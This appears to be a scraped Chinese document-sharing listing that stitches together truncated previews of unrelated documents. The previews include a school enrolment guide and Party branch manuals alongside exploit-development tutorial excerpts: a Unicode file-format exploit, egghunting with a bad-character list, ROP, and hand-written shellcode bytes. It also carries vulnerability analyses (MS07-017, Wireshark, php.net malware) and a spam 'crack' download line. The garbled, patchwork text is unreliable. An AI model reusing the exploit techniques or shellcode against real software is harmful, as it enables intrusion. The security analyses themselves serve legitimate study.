桂城街道2014年公办小学入学指南 桂 城 街 道 2016 年 公 办 小 学 入 学 指 南 佛 山 市 南 海 区 入 学 相 关 政 策 2 桂 城 户 籍 学 生 入 学 指 南 4 非 户 籍 常 住 人 口 子 女 政 策 性 借 读 生 申 请 指 南 7 非 户 籍 常 住 人 口 子 女 普 通 借 读 生 积 分 入 学 申 请 指 南 16 2016 年 桂 城 街 道 公 办 小 学 起 始 年 级 招 生

More information

格式化字符串 Weifeng Sun School of Software, DLUT

格式化字符串 Weifeng Sun School of Software, DLUT 格式化字符串 Weifeng Sun School of Software, DLUT 格式化字符串漏洞 格式化字符串, 也是一种比较常见的漏洞类型 会触发该漏洞的函数很有限 主要就是 printf 还有 sprintf,fprintf 等等 c 库中 print 家族的函数 >int printf(const char* format,...) 2 / 42 3 / 42 A B 字符串指针 char

More information

上面的介绍会使我们的漏洞利用更清晰. 再次说明这篇教程不会覆盖所有的系列, 你还需要 做更多的研究. 好吧, 开始我们的旅途! 重现崩溃 是时候崩溃了 "Triologic Media Player 8". 这将是另一个文件格式的漏洞. 下面是 POC 和崩溃的截图, 你只需载入 evil.m3u

上面的介绍会使我们的漏洞利用更清晰. 再次说明这篇教程不会覆盖所有的系列, 你还需要 做更多的研究. 好吧, 开始我们的旅途! 重现崩溃 是时候崩溃了 Triologic Media Player 8. 这将是另一个文件格式的漏洞. 下面是 POC 和崩溃的截图, 你只需载入 evil.m3u Unicode 0x00410041 译者 :Netfairy 前言 欢迎来到漏洞利用系列教程第五部分. 注意到前面的难度逐渐递增并且都是建立在彼此的 基础上的. 这部分有点不一样, 是时候提高游戏难度, 杀死 unicode 这个怪物! 这部分教给你 两个宝贵的经验 :(1) 生活给屎黄金涂上了柠檬油漆 (2) 更加努力我将用 "Triologic Media Player 8" 演示 unicode

More information

标准化党支部建设

标准化党支部建设 后 勤 集 团 党 总 支 标 准 化 党 支 部 建 设 工 作 手 册 后 勤 集 团 党 总 支 办 公 室 编 二 〇 一 五 年 四 月 2 前 言 党 支 部 是 党 的 组 织 中 最 基 层 的 组 织 形 式, 是 党 的 全 部 工 作 和 战 斗 力 的 基 础 为 使 党 的 基 层 组 织 工 作 进 一 步 规 范 化 制 度 化 标 准 化, 不 断 增 强 党 支 部

More information

动画光标文件(

动画光标文件( Ms07-017 动画光标文件 (.Ani) 漏洞分析 neinei/2007-4-8 一 漏洞描述 : Microsoft Windows 在处理动画光标文件 (.ani) 时没有正确地验证 ANI 头中所指定的大小, 导致栈溢出漏洞 恶意攻击者可以在网页中嵌入相关脚本, 在用户浏览网页时会执行伪造的.ani 文件, 或者用户打开了恶意的邮件消息, 都会触发这个溢出, 导致执行任意代码 该文件 (.ani)

More information

ebook50-15

ebook50-15 15 82 C / C + + Developer Studio M F C C C + + 83 C / C + + M F C D L L D L L 84 M F C MFC DLL M F C 85 MFC DLL 15.1 82 C/C++ C C + + D L L M F C M F C 84 Developer Studio S t u d i o 292 C _ c p l u s

More information

投 身 基 层 建 功 立 业 政 治 部 主 任 李 继 耐 上 将 的 批 示 ( 照 片 ) 国 防 生, 梦 想 之 翼 能 飞 多 远? 对 清 华 大 学 国 防 生 走 基 层 之 路 的 追 踪 与 思 考 清 华 学 子 国 防 生 岱 天 荣 摄 - 1 -

投 身 基 层 建 功 立 业 政 治 部 主 任 李 继 耐 上 将 的 批 示 ( 照 片 ) 国 防 生, 梦 想 之 翼 能 飞 多 远? 对 清 华 大 学 国 防 生 走 基 层 之 路 的 追 踪 与 思 考 清 华 学 子 国 防 生 岱 天 荣 摄 - 1 - 目 录 总 政 治 部 主 任 李 继 耐 上 将 的 批 示... - 0 - 国 防 生, 梦 想 之 翼 能 飞 多 远? 对 清 华 大 学 国 防 生 走 基 层 之 路 的 追 踪 与 思 考. - 1 - 军 旅 人 生 从 清 华 启 航... - 13 - 厚 德 值 军 营 自 强 续 辉 煌... - 20 - 扎 根 基 层 建 功 立 业... - 23 - 扎 根 基 层

More information

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字 适 合 读 者 : 入 侵 爱 好 者 溢 出 爱 好 者 前 置 知 识 : 汇 编 语 言 缓 冲 区 溢 出 基 本 原 理 文 / 图 何 永 强 Word 畸 形 数 据 结 构 溢 出 漏 洞 分 析 与 利 用 以 前 都 是 写 远 程 溢 出 漏 洞, 感 觉 也 该 换 换 口 味 了 事 实 上,2005 年 以 来 的 远 程 溢 出 漏 洞, 如 MS05-039 MS06-040

More information

前沿技术 php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 p

前沿技术 php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 p php.net 被植入恶意代码分析 核心技术部张云海 关键字 :php.net 挂马 Magnitude 摘要 : 本文对 2013 年 10 月 php.net 被植入的恶意代码进行分析 1. 引言 013 年 10 月 23 日,Google 的 Safe Browsing 检测到 php.net 存在下载 安装恶意软 2件的行为, 将该网站标记为可疑 php.net 的管理者对此进行了调查,

More information

寻蛋技术 译者 :Netfairy 前言 欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将 用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里 坏字符 : \x00\x0d\x0a\x3d\x20\x3f

寻蛋技术 译者 :Netfairy 前言 欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将 用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里 坏字符 : \x00\x0d\x0a\x3d\x20\x3f 寻蛋技术 译者 :Netfairy 前言 欢迎来到漏洞利用开发系列教程第四部分. 这部分讲解一项很酷的技术 : 寻蛋. 这部分我将 用 Kolibri v2.0 HTTP Server 演示这项技术. 这里有写好的漏洞利用程序 : 这里 坏字符 : \x00\x0d\x0a\x3d\x20\x3f 漏洞利用环境 :Backtrack 5 调试机器 :Windows XP PRO SP3 漏洞软件 :

More information

cve Wireshark 溢出漏洞分析及利用代码的分析 Wireshark 是一款非常流行的网络封包分析软件. 其方便性, 开源性和跨平台性和可扩 展性, 导至其有很广大的使用人群, 尤其做网络相关开发工作的程序员. 现在我们要分析的 Cve 这个漏洞是在对

cve Wireshark 溢出漏洞分析及利用代码的分析 Wireshark 是一款非常流行的网络封包分析软件. 其方便性, 开源性和跨平台性和可扩 展性, 导至其有很广大的使用人群, 尤其做网络相关开发工作的程序员. 现在我们要分析的 Cve 这个漏洞是在对 cve-2010-0304 Wireshark 溢出漏洞分析及利用代码的分析 Wireshark 是一款非常流行的网络封包分析软件. 其方便性, 开源性和跨平台性和可扩 展性, 导至其有很广大的使用人群, 尤其做网络相关开发工作的程序员. 现在我们要分析的 Cve-2010-0304 这个漏洞是在对 lwres 协议解码中, 由于字符串读取处理不当造成的. 我们 可以从官方下到其源码, 来分析下漏洞产生的原因,

More information

材 料 目 录 1. 党 员 发 展 及 转 正 流 程 图 2. 申 请 入 党 人 员 基 本 信 息 及 培 养 记 录 表 3. 思 想 汇 报 传 阅 及 意 见 反 馈 表 4. 入 党 积 极 分 子 培 养 考 察 表 5. 政 治 审 查 函 调 信 模 板 6. 政 治 审 查

材 料 目 录 1. 党 员 发 展 及 转 正 流 程 图 2. 申 请 入 党 人 员 基 本 信 息 及 培 养 记 录 表 3. 思 想 汇 报 传 阅 及 意 见 反 馈 表 4. 入 党 积 极 分 子 培 养 考 察 表 5. 政 治 审 查 函 调 信 模 板 6. 政 治 审 查 发 展 党 员 工 作 的 流 程 及 工 作 模 板 为 了 贯 彻 落 实 学 校 关 于 发 展 党 员 工 作 的 若 干 规 定, 进 一 步 规 范 发 展 党 员 中 的 工 作 环 节, 细 化 工 作 要 求, 方 便 二 级 党 组 织 及 党 支 部 具 体 工 作 中 执 行 有 关 规 定, 学 校 党 委 组 织 部 参 照 市 委 教 育 工 委 北 京 高 校 发 展

More information

幻灯片 1

幻灯片 1 操作系统课程实验 Lab1:bootloader 启动 ucore os 大纲 x86 启动顺序 C 函数调用 gcc 内联汇编 (inline assembly) x86-32 下的中断处理 理解 x86-32 平台的启动过程理解 x86-32 的实模式 保护模式理解段机制 x86 启动顺序 x86 启动顺序 寄存器初始值 摘自 "IA-32 Intel 体系结构软件开发者手册 " x86 启动顺序

More information

"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x8

\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf \xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93 \x99\x1c\x3d\x27\xef\x8 Writing W32 shellcode 译者 :Netfairy 前言 欢迎继续! 以前我们都是用现成的 shellcode, 今天我们将从头开始写我们自己的 shellcode. 这是一个十分有用的练习, 两个原因 : (1) 如果有一个漏洞有严重的空间限制 (2) 理解 ROP( 返回导向编程 ) 的好办法 为了加快速度我决定使用第一部分为 "FreeFloat FTP" 写的漏洞利用框架.

More information

Ioncube Php Encoder 8 3 Crack 4. llamaba octobre traslado General Search colony

Ioncube Php Encoder 8 3 Crack 4. llamaba octobre traslado General Search colony Ioncube Php Encoder 8 3 Crack 4 ->>->>->> DOWNLOAD 1 / 5 2 / 5 Press..the..General..Tools..category4Encrypt..and..protect..files..with..PHP..encoding,..encryption,..ob fuscation..and..licensing... 2016

More information

返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需

返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需 返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需要你做很多的工作才能掌握它. 但是在次提醒本教 程不会覆盖 ROP 所有细节. 如果你想更好的理解 ROP

More information

Microsoft Word - 把时间当作朋友(2011第3版)3.0.b.06.doc

Microsoft Word - 把时间当作朋友(2011第3版)3.0.b.06.doc 2 5 8 11 0 13 1. 13 2. 15 3. 18 1 23 1. 23 2. 26 3. 28 2 36 1. 36 2. 39 3. 42 4. 44 5. 49 6. 51 3 57 1. 57 2. 60 3. 64 4. 66 5. 70 6. 75 7. 83 8. 85 9. 88 10. 98 11. 103 12. 108 13. 112 4 115 1. 115 2.

More information

<4D F736F F D20B5DAC8FDCBC4D5C2D7F7D2B5B4F0B0B82E646F63>

<4D F736F F D20B5DAC8FDCBC4D5C2D7F7D2B5B4F0B0B82E646F63> 第三章 Q3 1 1. 省略了 I/O 操作的复杂逻辑, 易实现, 耗费低 ; 2. 可以利用丰富的内存寻址模式实现灵活的 I/O 操作 Q3 2 假设存储单元 ds1 处寄存器地址为 0x2000, 代码如下 #define ds1 0x2000 while ( *ds1 == 0 ) ; Q3 3 假设设备 (dev1) 中有两个寄存器 ds1 和 dd1,dev1 的地址为 0x1000,ds1

More information

台中商銀流程圖

台中商銀流程圖 台 中 商 業 銀 行 新 電 話 銀 行 語 音 流 程 圖 目 錄 主 選 單 1 A 銀 行 服 務 2 A1 查 詢 服 務 3 A1.1 台 幣 存 款 餘 額 4 A1.2 利 率 匯 率 查 詢 5 A1.2.1 台 幣 利 率 查 詢 6 A1-2-2 外 幣 匯 率 查 詢 7 A1.3 匯 入 匯 款 查 詢 8 A1-4 匯 出 匯 款 查 詢 9 A1-5 放 款 應 繳 息

More information

土 木 与 交 通 学 院 发 展 学 生 党 员 的 选 拨 条 件 与 推 荐 细 则 为 进 一 步 规 范 我 院 学 生 党 建 工 作, 加 强 和 完 善 我 院 对 学 生 党 员 各 个 阶 段 人 员 的 选 拔 和 培 养 工 作, 提 高 我 院 发 展 学 生 党 员 质

土 木 与 交 通 学 院 发 展 学 生 党 员 的 选 拨 条 件 与 推 荐 细 则 为 进 一 步 规 范 我 院 学 生 党 建 工 作, 加 强 和 完 善 我 院 对 学 生 党 员 各 个 阶 段 人 员 的 选 拔 和 培 养 工 作, 提 高 我 院 发 展 学 生 党 员 质 土 木 与 交 通 学 院 发 展 学 生 党 员 工 作 时 间 表 45 上 半 年 下 半 年 时 间 党 建 工 作 委 员 会 党 支 部 团 支 部 3 月 收 齐 上 交 : 新 递 交 的 入 党 申 请 书 ; 入 党 导 出 数 据 库 入 党 积 极 分 子 发 展 对 象 预 备 党 员 名 单 反 培 养 人 填 写 培 养 意 见, 整 理 上 报 入 党 积 极 分 子

More information

<4D6963726F736F667420576F7264202D20BEB0B5C2D5F2B4ABCDB3D6C6B4C9B9A4D2D5352E33302E746373>

<4D6963726F736F667420576F7264202D20BEB0B5C2D5F2B4ABCDB3D6C6B4C9B9A4D2D5352E33302E746373> ICS 点 击 此 处 添 加 中 国 标 准 文 献 分 类 号 DB36 江 西 省 地 方 标 准 DB 36/ XXXXX XXXX 代 替 DB 景 德 镇 传 统 制 瓷 工 艺 点 击 此 处 添 加 标 准 英 文 译 名 点 击 此 处 添 加 与 国 际 标 准 一 致 性 程 度 的 标 识 文 稿 版 次 选 择 XXXX - XX - XX 发 布 XXXX - XX -

More information

<4D6963726F736F667420576F7264202D20B3C9D7E9CDA83830BAC52032303135C4EAA1B0B3C9B6BCC8CBB2C5BCC6BBAEA1B1C9EAB1A8CDA8D6AA2E646F63>

<4D6963726F736F667420576F7264202D20B3C9D7E9CDA83830BAC52032303135C4EAA1B0B3C9B6BCC8CBB2C5BCC6BBAEA1B1C9EAB1A8CDA8D6AA2E646F63> 中 共 成 都 市 委 组 织 部 文 件 成 组 通 2015 80 号 中 共 成 都 市 委 组 织 部 关 于 开 展 成 都 人 才 计 划 长 期 项 目 青 年 项 目 海 外 短 期 项 目 和 顶 尖 创 新 创 业 团 队 项 目 申 报 工 作 的 通 知 各 区 ( 市 ) 县 委 组 织 部, 成 都 高 新 区 成 都 天 府 新 区 党 工 委 组 织 部 : 按 照

More information

PowerPoint 演示文稿

PowerPoint 演示文稿 The BitCoin Scripting Language 交易实例 交易结构 "result": { "txid": "921a dd24", "hash": "921a dd24", "version": 1, "size": 226, "locktime": 0, "vin": [ ], "vout": [ ], "blockhash": "0000000000000000002c510d

More information

Microsoft Word - 10 baogao_112_128.doc

Microsoft Word - 10 baogao_112_128.doc 報 告 ( 一 ) 作 用 報 告 是 一 種 帶 有 敘 述 說 明 性 質 的 文 書, 可 以 是 下 級 用 來 向 上 級 敘 述 或 匯 報 某 些 事 情 或 工 作 進 展 的 文 件, 也 可 以 是 某 些 機 關 團 體 對 其 成 員 會 眾, 或 受 委 托 者 對 委 托 者 就 特 定 事 情 的 報 告 ; 可 以 用 來 介 紹 狀 況 分 析 現 象 說 明 原

More information

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re MUSE v4.9.0.006 (.m3u) 本地溢出漏洞的分析和利用 文 : 冰雪风谷文件格式溢出漏洞一直是黑客门攻击的热点, 从暴风影音播放器到 qq 播放器以及其它的各种播放器, 都被人暴过相关的漏洞. 至于造成漏洞的原因, 大部分是由于往栈里拷贝字符的时候, 没有检查字符串的长度, 导致拷贝的长度大于缓冲区的长度, 于是造成了溢出. 当然, 还有部分是整数溢出, 出现在一些有无符号数混合使用,

More information

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9

> u eip l 3 002f2aa9 90 nop 002f2aaa 90 nop >!chkimg -d -lo 1 ping // 检查文件是否被篡改? 002f2aa7-002f2aaa 4 bytes - ping!maincrtstartup [ e :f0 cc 9 在 WINDBG 中定位 ExceptionAddress 核心技术部陈庆 关键字 : 调试异常 windbg second chance ExceptionAddress 摘要 : 在 windbg 中调试时, 碰上 second chance 时, 栈回溯已经看不到与 ExceptionAddress 直接相关的信息, 但我们调试的目的就是要找到 ExceptionAddress 本文介绍了几种通用思路来解决这个问题

More information

(一)宿舍生活解惑區

(一)宿舍生活解惑區 歡 迎 來 到 嘉 大 蘭 潭 校 區 宿 舍 手 冊 1 宿 舍 環 境 與 文 化 之 營 造 生 活 輔 導 組 江 政 達 組 長 大 學 校 園 是 一 個 開 放 的 學 習 環 境 與 空 間, 一 切 資 源 大 家 可 以 共 同 分 享 使 用 學 生 宿 舍 裏 面 的 公 共 區 域 與 寢 室, 是 同 學 們 在 校 園 裡 面 能 夠 擁 有 且 能 自 主 的 空 間,

More information

今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E =====================

今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E ===================== 吾爱破解论坛 [LCG] [LSG] 立足软件安全和病毒分析最前端, 丰富的技术版块交相辉映, 由无数加密解密及反病毒爱好者共同维护, 留给世界一抹值得百年回眸的惊 艳, 沉淀百年来计算机应用之精华与优雅, 信息线条与生活质感淡定交融, 任岁月流转, 低调而奢华的技术交流与研究却是亘古不变 标题 : 一个感染样本的简单分析 作者 :ximo 今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单,

More information

提纲. 1 实验准备. 2 从实模式进入保护模式. 3 小结 陈香兰 ( 中国科学技术大学计算机学院 ) 软件综合实验之操作系统 July 1, / 11

提纲. 1 实验准备. 2 从实模式进入保护模式. 3 小结 陈香兰 ( 中国科学技术大学计算机学院 ) 软件综合实验之操作系统 July 1, / 11 .. 软件综合实验之操作系统 进入保护模式 陈香兰 中国科学技术大学计算机学院 July 1, 2016 陈香兰 ( 中国科学技术大学计算机学院 ) 软件综合实验之操作系统 July 1, 2016 1 / 11 提纲. 1 实验准备. 2 从实模式进入保护模式. 3 小结 陈香兰 ( 中国科学技术大学计算机学院 ) 软件综合实验之操作系统 July 1, 2016 2 / 11 实验准备 实验环境准备

More information

<4D F736F F D20B1D0A87CB3A1C5E9A87CB870B8C9A755B1C0B0CABEC7AED5C5E9A87CB942B0CAB56FAE69B867B64FADECAB682E646F6378>

<4D F736F F D20B1D0A87CB3A1C5E9A87CB870B8C9A755B1C0B0CABEC7AED5C5E9A87CB942B0CAB56FAE69B867B64FADECAB682E646F6378> 教 育 部 體 育 署 補 助 推 動 學 校 體 育 運 動 發 展 經 費 原 則 中 華 民 國 98 年 1 月 6 日 教 育 部 臺 體 ( 一 ) 字 第 0970252252C 號 令 發 布 中 華 民 國 100 年 1 月 26 日 教 育 部 臺 體 ( 三 ) 字 第 1000001924C 號 令 發 布 中 華 民 國 101 年 4 月 5 日 教 育 部 臺 體 (

More information

<4D6963726F736F667420576F7264202D20BBFAB5E7BFD8D6C6B9A4B3CCD7A8D2B5BFCEB3CCC9E8BCC6D6B8B5BCB4F3B8D92E646F63>

<4D6963726F736F667420576F7264202D20BBFAB5E7BFD8D6C6B9A4B3CCD7A8D2B5BFCEB3CCC9E8BCC6D6B8B5BCB4F3B8D92E646F63> 机 电 控 制 工 程 专 业 课 程 设 计 指 导 大 纲 ( 二 级 项 目 ) 负 责 人 : 姜 万 录 孔 祥 东 张 齐 生 吴 晓 明 开 课 学 期 : 第 七 学 期 课 程 类 别 : 实 践 性 教 学 环 节 课 程 名 称 : 液 压 传 动 系 统 气 压 传 动 及 控 制 电 液 伺 服 与 比 例 控 制 系 统 适 用 专 业 : 机 电 控 制 工 程 专 业

More information

<4D6963726F736F667420576F7264202D203230313330383136D6D0B9FAB5D8D6CAB4F3D1A7BFC6D1D0BEADB7D1D3D0B9D8D6C6B6C82D48442E646F63>

<4D6963726F736F667420576F7264202D203230313330383136D6D0B9FAB5D8D6CAB4F3D1A7BFC6D1D0BEADB7D1D3D0B9D8D6C6B6C82D48442E646F63> 中 国 地 质 大 学 ( 北 京 ) 关 于 进 一 步 规 范 科 研 行 为 的 意 见... 1 中 国 地 质 大 学 ( 北 京 ) 关 于 进 一 步 加 强 科 研 经 费 会 计 核 算 管 理 的 有 关 规 定 5 中 国 地 质 大 学 ( 北 京 ) 科 研 经 费 审 计 实 施 办 法... 8 中 国 地 质 大 学 ( 北 京 ) 科 研 经 费 管 理 办 法...

More information

Microsoft Word - 把时间当作朋友(2011第3版)3.0.b.07.doc

Microsoft Word - 把时间当作朋友(2011第3版)3.0.b.07.doc 2 5 8 11 0 1. 13 2. 15 3. 18 1 1. 22 2. 25 3. 27 2 1. 35 2. 38 3. 41 4. 43 5. 48 6. 50 3 1. 56 2. 59 3. 63 4. 65 5. 69 13 22 35 56 6. 74 7. 82 8. 84 9. 87 10. 97 11. 102 12. 107 13. 111 4 114 1. 114 2.

More information

标题:【翻译】突破win2003 sp2中基于硬件的DEP

标题:【翻译】突破win2003 sp2中基于硬件的DEP 前置知识 : 汇编关键词 : 漏洞 Shellcode 堆栈 菜鸟版 Exploit 编写指南之五十六 : 2009 年第 10 期 突破 Windows 2003 基于硬件的 DEP 文 / david kennedy 译 / riusksk 创建数据执行保护 DEP(Data Exectution Protection) 的初衷是为了防止不可运行 的内存区域运行代码 在写本文之前, 我仔细阅读了

More information

安徽电子工程学校

安徽电子工程学校 学 校 德 育 全 程 路 线 图 重 点 项 目 实 施 细 则 执 行 文 件 安 徽 电 子 工 程 学 校 第 一 部 分 学 校 德 育 教 育 全 程 路 线 图 重 点 项 目 实 施 进 度 表 一 年 级 德 育 课 项 目 名 入 学 -- 期 中 -- 寒 假 -- 期 中 -- 选 修 课 备 注 称 期 中 期 末 期 中 期 末 新 生 档 案 管 理 首 次 见 面 会

More information

计算机网络实验说明

计算机网络实验说明 计算机网络实验说明 龚旭东 电三楼 420 lzgxd@mailustceducn 2011 年 11 月 1 日 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 1 / 20 Outline 1 实验系统介绍 实验环境实验流程 2 实验内容编程实验交互实验观察实验 3 一些控制台命令 4 实验报告说明 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 2

More information

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt MINIX ( 730000) ( 730000) MINIX MINIX2.0 MINIX : MINIX TP3 1 MINIX UNIX Tanenbaum UNIX MINIX LINUX MINIX MINIX MINIX1.0 UNIX V7 MINIX2.0[3] POSIX MINIX3 MINIX Gabriel A. Wainer 1994-1995 [5] 1998 I/O 2002

More information

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco Windows RTEMS 1 Danilliu MMI TCP/IP 80486 QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos ecos Email www.rtems.com RTEMS ecos RTEMS RTEMS Windows

More information

申 请 律 师 执 业 许 可 初 审 服 务 指 南 目 录 一 办 理 要 素 ( 一 ) 事 项 名 称 和 编 码 4 ( 二 ) 实 施 机 构 4 ( 三 ) 申 请 主 体 4 ( 四 ) 受 理 地 点 4 ( 五 ) 办 理 依 据 4 ( 六 ) 办 理 条 件 5 ( 七 )

申 请 律 师 执 业 许 可 初 审 服 务 指 南 目 录 一 办 理 要 素 ( 一 ) 事 项 名 称 和 编 码 4 ( 二 ) 实 施 机 构 4 ( 三 ) 申 请 主 体 4 ( 四 ) 受 理 地 点 4 ( 五 ) 办 理 依 据 4 ( 六 ) 办 理 条 件 5 ( 七 ) 行 政 许 可 3716000101503 申 请 律 师 执 业 许 可 初 审 服 务 指 南 滨 州 市 司 法 局 发 布 2015-09-01 1 申 请 律 师 执 业 许 可 初 审 服 务 指 南 目 录 一 办 理 要 素 ( 一 ) 事 项 名 称 和 编 码 4 ( 二 ) 实 施 机 构 4 ( 三 ) 申 请 主 体 4 ( 四 ) 受 理 地 点 4 ( 五 ) 办 理

More information

图 文 聚 焦 国 培 计 划 (2013) 甘 肃 省 农 村 小 学 音 乐 骨 干 教 师 短 期 集 中 培 训 9 月 4 日 开 班 了, 学 员 老 师 们 从 甘 肃 省 各 个 县 市 州 汇 聚 湖 南 一 师, 开 始 了 为 期 14 天 的 培 训 学 习 : 鲜 明 的

图 文 聚 焦 国 培 计 划 (2013) 甘 肃 省 农 村 小 学 音 乐 骨 干 教 师 短 期 集 中 培 训 9 月 4 日 开 班 了, 学 员 老 师 们 从 甘 肃 省 各 个 县 市 州 汇 聚 湖 南 一 师, 开 始 了 为 期 14 天 的 培 训 学 习 : 鲜 明 的 . 国 培 简 报 国 培 计 划 (2013) 中 西 部 项 目 甘 肃 省 小 学 音 乐 短 期 集 中 培 训 班 二 〇 一 三 年 第 一 期 总 第 三 十 期 本 期 内 容 图 文 聚 焦 (1) 学 员 发 言 音 乐 学 员 代 表 在 国 培 开 班 典 礼 上 的 讲 话 (1) 课 堂 掠 影 (3) 教 师 心 语 (5) 国 培 掠 影 (12) 教 学 交 流 (14)

More information

Microsoft Word - 三方协议书与接收函的相关说明学生版.doc

Microsoft Word - 三方协议书与接收函的相关说明学生版.doc 三 方 协 议 书 与 接 收 函 的 相 关 说 明 各 位 同 学, 毕 业 生 就 业 签 约 已 进 入 较 繁 忙 阶 段, 由 于 不 少 同 学 签 订 三 方 协 议 书 时 对 落 户 档 案 派 遣 等 常 规 手 续 都 不 甚 了 解, 漏 办 各 类 手 续 不 仅 影 响 自 身 工 作 效 率, 也 可 能 对 毕 业 派 遣 造 成 问 题 有 鉴 于 此, 大 学

More information

环 境, 我 在 巩 固 在 校 期 间 所 学 习 的 理 论 知 识 的 同 时, 不 断 的 充 实 己, 利 用 业 余 时 间 主 动 学 习 专 业 知 识, 技 能, 把 理 论 联 系 到 工 作 实 践 中 作 为 一 名 工 作 生 活 中 的 党 员, 我 始 终 注 意 与

环 境, 我 在 巩 固 在 校 期 间 所 学 习 的 理 论 知 识 的 同 时, 不 断 的 充 实 己, 利 用 业 余 时 间 主 动 学 习 专 业 知 识, 技 能, 把 理 论 联 系 到 工 作 实 践 中 作 为 一 名 工 作 生 活 中 的 党 员, 我 始 终 注 意 与 个 人 入 党 转 正 申 请 书 多 篇 范 例 大 学 生 入 党 转 正 申 请 书 敬 爱 的 党 支 部 : 去 年 月 24 日 我 被 党 组 织 吸 收 为 中 国 共 产 党 预 备 党 员, 到 今 年 月 24 日 预 备 期 满, 为 了 便 于 党 组 织 对 我 的 考 察, 现 将 自 己 半 年 来 的 情 况 做 如 下 总 结 : 大 四 一 学 期 几 乎 没

More information

邻居啊 第二天 对门却悄无声息了 莫非昨夜的吵闹 仅是个幻觉 夜幕拉下时 寒风又吱溜溜地叫个不停 老婆 睡下后 我这只夜猫子 继续兴致勃勃地跟着福尔 摩斯去探案 白天的喧嚣退去了 周围格外安静 正 是读书的好时候 突然 响起了钟摆声 哒 哒 哒 节奏匀称 不疾不徐 声响却愈来愈大 格外突兀 了 原来

